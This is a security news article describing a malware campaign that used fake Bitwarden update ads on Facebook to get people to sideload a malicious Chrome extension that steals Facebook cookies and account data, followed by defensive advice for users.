HQ/EMEAFind out how we can help your business
A new malware campaign uses fake Bitwarden ads on social media platforms like Facebook to push a malicious Google Chrome extension that could capture and steal sensitive user information from the browser.
Bitwarden is a popular password manager tool with a free tier that includes end-to-end encryption, cross-platform support, MFA, and a user-friendly UI. Its user base has consistently increased in recent years since various competitors suffered security breaches, prompting users to seek alternatives.
The fake Bitwarden ads leverage a bogus alert to introduce a malicious update.
According to investigations, the fake Bitwarden ads on Facebook execute their campaign by informing users that they are still using an outdated version of Bitwarden, which they need to update to protect their credentials.
Once visitors access the link to the bogus ads, they are redirected to an attacker-generated landing page. Subsequently, the campaign will require site visitors to download a ZIP archive from a Google Drive folder rather than installing the extension instantly when clicking the link.
Though this should be a significant red flag, inexperienced Chrome Web Store users may proceed with the manual installation by following the directions on the webpage. The installation includes enabling ‘Developer Mode’ on Chrome and manually sideloading the extension onto the software, bypassing security checks.
Upon installation, the extension registers as ‘Bitwarden Password Manager’ version 0.0.1 and obtains capabilities to intercept and alter user activity.
Researchers revealed that the main objectives of the campaign include collecting Facebook cookies, using public APIs to collect IP and geolocation data, collecting Facebook user details, account information, and billing data via Facebook’s Graph API, manipulating the browser DOM to display bogus loading messages, and encoding sensitive data and sending it to an attacker-controlled Google Script URL.
Bitwarden users should disregard advertising prompting extension updates to reduce since Chrome extensions are automatically updated when the vendor releases a new version. Furthermore, researchers noted that extensions should only be installed through Google’s official web store or by following links from the project’s official website.
Users should always review the requested permissions and be wary of unnecessary cookie, network, and website data access demands.
